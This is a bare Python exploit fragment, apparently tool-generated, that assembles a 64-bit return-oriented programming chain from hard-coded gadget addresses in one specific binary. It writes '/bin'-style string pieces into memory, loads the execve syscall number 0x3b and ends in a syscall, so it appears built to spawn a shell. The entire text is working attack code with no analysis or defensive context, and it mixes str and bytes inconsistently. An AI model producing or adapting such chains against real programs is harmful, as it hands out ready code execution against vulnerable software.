payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x4142fe)
# 0x00000000004142fe: xchg eax, ebp; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x7c6d4bb0)+p64(0x4102b3)
# 0x00000000004102b3: add dword ptr [rbp - 0x7c2a8b40], eax; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x68662f)+p64(0x4142fe)
# 0x00000000004142fe: xchg eax, ebp; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x7c6d4bb4)+p64(0x4102b3)
# 0x00000000004102b3: add dword ptr [rbp - 0x7c2a8b40], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x42c070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40a486)
# 0x000000000040a486: pop rcx; ret 0x21; 
payload += p64(0x40fcbd)+p64(0x4017d0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*1
# 0x00000000004017d0: pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x416701)
# 0x0000000000416701: xchg eax, esi; add rcx, r14; jmp rcx; 
payload += b''
# 0x000000000040fcbd: xchg eax, edx; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x4142fe)
# 0x00000000004142fe: xchg eax, ebp; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4169f8)
# 0x00000000004169f8: syscall; 
payload += b''
